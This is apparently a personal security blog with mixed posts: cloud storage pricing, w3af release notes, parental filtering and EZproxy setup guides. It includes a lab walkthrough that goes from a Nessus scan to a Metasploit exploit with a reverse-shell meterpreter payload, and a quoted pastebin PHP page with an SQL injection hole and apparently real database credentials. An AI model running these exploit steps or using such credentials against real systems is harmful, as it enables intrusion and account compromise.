Battle of the cloud storage providers

With the recent show and tell of Google’s GDrive cloud storage solution, it’s now painfully obvious that the other cloud storage providers in that arena are scrambling for fear of losing business. As we all know, Google has a track record of coming out with solutions to rival its competitors and usually ends up the victor. This market has grown very popular over the last few years, and statistics have shown that users who start off as free users often become paying customers, so the key is to get as many free users as possible.

For the last year or so the words “free cloud storage” were almost synonymous with “Dropbox”; even on the mobile platform their application was widely accepted. Now, with Google finally in the arena, it’s going to be interesting to see how the others start to change their business models. I have recently received some form of communication from the following providers (SkyDrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of each and see how they might stack up against GDrive.

Let’s start with GDrive: they are offering 5 GB free for new users, have a mobile application (Android devices) and the GDocsDrive desktop client, support all of the average features (upload, share, collaborate), and as of now appear to have a 10 GB file size upload limit. The other interesting thing is the pricing: upgrading to 25 GB will only cost you $2.50/mo, or 100 GB for just $4.99/mo. The one reason I believe they might capture a large piece of market share is simply their name, combined with the fact that they have a solid infrastructure and should be able to handle more traffic than the average provider in this sphere.

Next is Dropbox, a free service that lets you bring all your photos, docs, and videos anywhere. Any file you save to your Dropbox automatically syncs to all your computers, phones, and even the Dropbox website. They start you off with 2 GB free, plus an additional 500 MB per referral; the paid model starts at 50 GB for $10/mo, with a file size upload limit of 2 GB (files uploaded via the website are capped at 300 MB).

SkyDrive, which has been trying to gain popularity for a while and at one point offered 25 GB of free storage, recently restructured and is now offering only 7 GB free to all new users. You had the option to keep your 25 GB if you were an existing user, but you had to log in and claim it before April 22, which has already passed. If you require more space and you love SkyDrive, you can get 20 GB for $10/yr or 100 GB for $50/yr. As of now SkyDrive offers the most free space and the most value for your money per GB annually.

Box is another competitor, who recently tried to gain new users by offering mobile users 50 GB free for life if they signed up from their mobile device. If you don’t use this option you can always get 25 GB for $10/mo or 50 GB for $20/mo. They have a few downsides: a 200 MB file upload cap, and they only offer a desktop client for business/enterprise users.

Last on my list is Ubuntu One, which currently offers the standard 5 GB for free users, with an additional 20 GB available for $3/mo or $30/yr. The good thing is that you get good value for your money; however, I don’t think they do a good job marketing this product, and as such I believe they might fade into the background amidst all the other big names out there.
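To put all of the plans above on one scale, here is a quick back-of-the-envelope comparison of annual cost per GB, using the prices quoted in this post (monthly plans annualized):

```python
# Annual cost per GB for the paid tiers mentioned above.
# Plan sizes in GB; monthly prices are multiplied by 12.
plans = {
    "GDrive 100 GB":     (100, 4.99 * 12),
    "Dropbox 50 GB":     (50, 10.00 * 12),
    "SkyDrive 100 GB":   (100, 50.00),
    "Box 50 GB":         (50, 20.00 * 12),
    "Ubuntu One +20 GB": (20, 30.00),
}

# Cheapest per-GB plans first.
for name, (gb, yearly) in sorted(plans.items(), key=lambda kv: kv[1][1] / kv[1][0]):
    print("%-18s $%.2f/GB/yr" % (name, yearly / gb))
```

SkyDrive comes out cheapest per GB on these numbers, which matches the conclusion above.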

For a great overview of some of the services mentioned above, take a glance at this comparison image I found over at PCWorld.

What services are you using?


w3af 1.0-stable released!




w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. The project is currently hosted at SourceForge; for further information, you may also want to visit the w3af SourceForge project page. You can also watch a few video demos over at w3af video demos!

I have used this application before on the BackTrack Linux pentesting distro, but at the time it was still being improved and it was really buggy, so I am really happy to see that a new release is out and I can’t wait to start testing.

In this latest release, we bring you some of the most important improvements to our framework:

* Stable code base, an improvement that will reduce your w3af crashes to a minimum. We’ve been fixing all of our long-standing bugs and wrote thousands of lines of doctests and various types of automation to make sure we can keep improving without breaking other sections of the code.

* Auto-Update, which will allow you to keep your w3af
installation updated without any effort. Always get the latest and
greatest from our contributors!

* Web Application Payloads: for people who enjoy exploitation techniques, this is one of the most interesting things you’ll see in web application security! We created various layers of abstraction around an exploited vulnerability in order to be able to write payloads that use emulated syscalls to read, write and execute files on the compromised web server. Keep an eye on the Rapid7 community blog for an entry completely dedicated to this subject!

* PHP static code analyzer: as part of a couple of experiments and research projects, Javier Andalia created a PHP static code analyzer that performs tainted-mode analysis of PHP code in order to identify SQL injections, OS commanding and remote file includes. At this time you can use this very interesting feature as a web application payload. After exploiting a vulnerability, try “payload php_sca”, which will download the remote PHP code to your box and analyze it to find more vulnerabilities!

And many others, such as:

* Refactoring of HTTP cache and GTK user interface code to
store HTTP requests only once on disk (5% performance improvement)
* Performance improvement in sqlite database by using indexes
(1% performance improvement)
* Huge w3af code-base refactoring on how URLs are handled.
Moved away from handling URLs as strings into a url_object model. This
reduces the number of times a URL is parsed into its component pieces
(protocol, domain, path, query string, etc.) and put back together
into a string, which clarifies the code and makes it run faster.
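The url_object idea can be sketched in a few lines; note this is an illustration of parse-once URL handling, not w3af’s actual class:

```python
from urllib.parse import urlparse

class URLObject:
    """Parse a URL once, keep the components, re-serialize on demand."""

    def __init__(self, url):
        parts = urlparse(url)          # single parse instead of many
        self.scheme = parts.scheme
        self.domain = parts.netloc
        self.path = parts.path
        self.query = parts.query

    def __str__(self):
        base = "%s://%s%s" % (self.scheme, self.domain, self.path)
        return base + ("?" + self.query if self.query else "")

u = URLObject("http://example.com/app/index.php?id=1")
print(u.domain)   # example.com
print(str(u))     # http://example.com/app/index.php?id=1
```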

We have a stable release, w0000t! Hmmmm… have we finished? Should we go home? No! We still have work to do; there are still features and capabilities we’d like to add. For example, as you read this, we’re working on integrating the multiprocessing module into w3af’s code, with the objective of using more than one CPU core at the same time and substantially improving our scanning speed. We’re also working on handling encodings through the use of unicode strings across the whole framework, and on making the user experience more intuitive in the UI.
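The multiprocessing direction described above boils down to fanning independent checks out across CPU cores; a toy sketch (again my own illustration, not w3af code):

```python
from multiprocessing import Pool

def audit(url):
    # Stand-in for a real plugin check; here it just flags .php pages.
    return url, url.endswith(".php")

if __name__ == "__main__":
    urls = ["http://example.com/page%d.php" % i for i in range(4)]
    with Pool() as pool:                 # one worker process per CPU core
        for url, flagged in pool.map(audit, urls):
            print(url, flagged)
```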

As usual, you can get the latest installable packages from the [0] website! Just download and enjoy our latest improvements!


To go a step further, check out the documentation and other resources on the tool:

Official documentation:

  • The w3af user’s guide can be found here.
  • A French translation of the user’s guide, made by Jerome Athias, can be found here.
  • The epydoc documentation for w3af can be found here.
  • The presentation materials used at the T2 conference can be found here.

External resources:

  • Josh Summit wrote a two-part tutorial on w3af on his blog: 1, 2.
  • Fuzion wrote a Windows installation tutorial on his blog.

From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan and then, after finding the goodies, had to head to ExploitDB or a similar site in search of an exploit? Or, if you are a pro, it’s off to write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juicy vulnerability. If this is the first time you have heard of ExploitDB or Metasploit, you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of Nessus from HERE, and don’t forget to register for a HomeFeed license. Now create your scan policy, or use one of the default policies. I selected the web application policy since the target server was running an outdated web application. Once your scan is complete, download the report and save it in .nessus format.
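Incidentally, the .nessus (v2) report you just saved is plain XML — findings are ReportItem elements nested under each ReportHost — so you can peek at it yourself before importing it anywhere. A sketch with an invented miniature sample (the hostname, ports and plugin names below are made up):

```python
import xml.etree.ElementTree as ET

# Invented miniature .nessus v2 sample: ReportItem findings under a ReportHost.
SAMPLE = """\
<NessusClientData_v2><Report name="demo">
  <ReportHost name="testsrvr">
    <ReportItem port="80" severity="3" pluginID="11030"
                pluginName="Apache mod_rewrite overflow"/>
    <ReportItem port="445" severity="1" pluginID="10394"
                pluginName="SMB log in"/>
  </ReportHost>
</Report></NessusClientData_v2>"""

def findings(xml_text, min_severity=3):
    """Return (host, port, plugin name) for findings at or above min_severity."""
    root = ET.fromstring(xml_text)
    out = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            if int(item.get("severity", "0")) >= min_severity:
                out.append((host.get("name"), item.get("port"),
                            item.get("pluginName")))
    return out

print(findings(SAMPLE))   # only the severity-3 Apache finding survives the filter
```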

Step two: Launching  Metasploit

Log in to your machine of choice; in my case it’s my BackTrack 4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
  • ./msfconsole
  • svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned Nessus report, and then perform your hacking kung fu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

msf > db_import /pentest/results/nessus_report_TestSrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that match the various vulnerabilities from the Nessus report; it will not automatically run the exploits for you unless you use the -e option. In most cases, if you are testing against a live system, you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST
msf exploit(apache_mod_rewrite_ldap) > set RHOST
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on it’s GAME OVER!



Protecting the innocent from the Internet part 1

Being a father of four, with my oldest already at the age where he needs to use the computer, I started asking myself: do I have the ideal setup? The answer was “not really”. Don’t get me wrong, I have a pfSense firewall and a few other protections in place; however, I wanted to build a solution from the ground up instead of just installing a bunch of packages on my firewall without really understanding what’s going on in the back end.

My proposed solution is a system that caches and scans web traffic for viruses as well as performs some sort of content filtering based on various detection methods (phrase matching, PICS filtering, URL filtering, etc.), and most importantly the solution must be **FREE** to implement. I am sure there are other solutions out there that do a better job than the one I have outlined, and by all means feel free to comment or email me.

Tools I plan on using:

  • FreeBSD 8.1
  • ClamAV
  • Squid
  • Dansguardian
  • Privoxy
  • HAVP

FreeBSD: If you are going to choose an OS I would suggest BSD because, in my opinion, it’s one of the most secure and well-built systems out there.

ClamAV: An open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner, and an advanced tool for automatic database updates.

Squid: Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages.

Dansguardian: An award-winning open source web content filter which currently runs on Linux, FreeBSD, OpenBSD, NetBSD, Mac OS X, HP-UX, and Solaris. It filters the actual content of pages based on many methods including phrase matching, PICS filtering and URL filtering, rather than purely filtering against a banned list of sites like lesser, purely commercial filters.

Privoxy: A non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes.

HAVP (HTTP AntiVirus Proxy): A proxy with an anti-virus filter. It does not cache or filter content.

Setup Phase

The first thing you need to do, before you start installing your apps, is to set up a static address on your BSD box; in my case I have FreeBSD 8.1:

vi /etc/rc.conf and add the following lines, using your own IP, netmask and gateway:

ifconfig_le0=" netmask"
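Since the actual address values didn’t make it into this post, here is what those rc.conf entries typically look like, with made-up RFC 1918 placeholder values; substitute your own interface name, address, netmask and gateway:

```shell
# /etc/rc.conf -- placeholder values only, adjust for your network
ifconfig_le0="inet netmask"
defaultrouter=""
```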

I would also run freebsd-update fetch and freebsd-update install, since it never hurts to have an up-to-date system. This is as far as I will go in this post; in my next post I will walk through the install, config, and testing. Comments and suggestions are always welcome.

–Sherwyn AKA Infolookup


Month of Abysssec Undisclosed Bugs

The post below came through the Full Disclosure mailing list today, and I figured something this interesting merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and PoCs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novell, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database, averaging one 0day and one binary analysis a day.

Get your hard-hats on and your VMs and debugging tools organized – it’s going to be an intense ride.

Posted today – MOAUB Day 1:



Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update your various applications to their latest versions. Lastly, if you have not been looking at your logs and consoles, this week might be a good time to start.

Being smart about testing your application

This is just going to be a short writeup on something I figured was worth mentioning. While going through pastebin I found the following entry 3 seconds after it was posted:


<?php
include 'top.php';
include 'submenuhonorshall.php';

$db = 'gnemi_addison';
mysql_connect("", "gnemi_root", "ignurupi87") or die(mysql_error());
mysql_select_db($db) or die(mysql_error());
?>

<div id="content">
<h1>Honors Hall Library</h1>
<form method="post">
<p class="norm">
<select name="searchby">
<option value="Author_First_Name">Author First Name</option>
<option value="Author_Last_Name" selected="selected">Author Last Name</option>
<option value="Title">Title</option>
</select>
<input type="text" name="query" />
<input type="submit" value="Submit!" />
</p>
</form>

<?php
$result = mysql_query("SELECT * FROM `library` WHERE `'" . $_POST['searchby'] . "'` = '" . $_POST['query'] . "' ORDER BY `Title` LIMIT 20");
while ($row = mysql_fetch_array($result)) {
    echo $row['Last Name'] . $row['First Name'] . $row['Title'] . $row['inout'];
}

include '../address.php';
include '../phptemplates/bottomhall.php';
?>
Now, to the average person that’s not a big deal, but after looking at that bit of PHP code the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly, are the username and password referenced still being used?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity, after visiting the site I was presented with the following:

Now I ***DID NOT LOG IN***, I repeat, ***DID NOT LOG IN***, so I don’t know if those credentials are valid, BUT what if they were? I am hoping for this person’s sake that all of the above information is just for testing purposes, but what if it’s not? Sanitizing all valid information before posting it would have been nice.

Ezproxy Deployment Guide

I was recently working on an EZproxy deployment project, and after having to jump between several pages on the website I decided to put together this guide for anyone who has to do an EZproxy deployment and wants to find everything in one place.

What is EZproxy?

EZproxy helps provide users with remote access to Web-based licensed content offered by libraries. It is middleware that authenticates library users against local authentication systems and provides remote access to licensed content based on the user’s authorization.

EZproxy Setup

md ezproxy
cd ezproxy

  • Download ezproxy-win32.exe into this directory.
  • Rename ezproxy-win32.exe to ezproxy.exe with the command: rename ezproxy-win32.exe ezproxy.exe
Install as a Service

  • Open a Command Prompt
  • cd ezproxy
  • Issue the command ezproxy -si
  • net start ezproxy

Configure Hostname and Admin login

  • Use a text editor to edit the file user.txt. To this file, add a line similar to this with your admin username and password: someuser:somepass:admin
  • Start the server with the command “ezproxy” or net start ezproxy

Configuring Proxy by hostname

  • Add the following two options to your DNS forward lookup zone
    • A record and
    • *
    • Edit your config.txt and add the following line
      • Option ProxyByHostname

Configure LDAP Authentication

  • Login to your ezproxy admin portal
  • Click on the “Test LDAP” link under the Miscellaneous section of the page
  • Fill out the following fields and this will build your config file for you:
    • Bind User: Specifies the distinguished name (DN) to use when binding to the directory to search for the user. For example, I used Sysinternals “Active Directory Explorer” to connect to our DC, browsed to the user in question, and looked at its properties for the bind user value: “CN=Ezproxy,OU=Test Accounts,OU=Network Testing,DC=testdomain,DC=edu”
    • Password: Password for your LDAP username Test123
    • LDAP Version: I used V3
    • Use SSL: Yes
    • Host[:port]: Enter your domain controller’s FQDN
    • Search Base: After entering your FQDN for your DC click on “Find search base” towards the bottom to see a list of available search bases, just click on the first one ex DC=testdomain,DC=edu
    • Disable referral chasing: Yes
    • Search Attribute: sAMAccountName
    • Test User: Regular AD user ex john.smith
    • Test Password: John Smith’s password
    • Lastly, copy the config that is output at the bottom of the page and add it to your user.txt file

Configure SSL secure login

  • Edit config.txt and add the line LoginPortSSL 443
  • Login to
  • Click on manage SSL certificates, then click on create new SSL cert
  • Fill out the info, and select self-sign or purchase a cert from VeriSign
  • Type ACTIVE in the box, then click activate to make the cert active
  • To force HTTPS login enter the following line
    • Option ForceHTTPSLogin

Configure Additional Security

  • Edit the config.txt file and add the following entries:

Audit Most
AuditPurge 7
Option StatusUser
Option LogSession
IntruderIPAttempts -interval=5 -expires=15 20
IntruderUserAttempts -interval=5 -expires=15 10
UsageLimit -enforce -interval=15 -expires=120 -MB=100 Global

Note: if you make any changes to the config.txt or user.txt files you must issue net stop ezproxy && net start ezproxy, or just use services.msc to stop and start the service.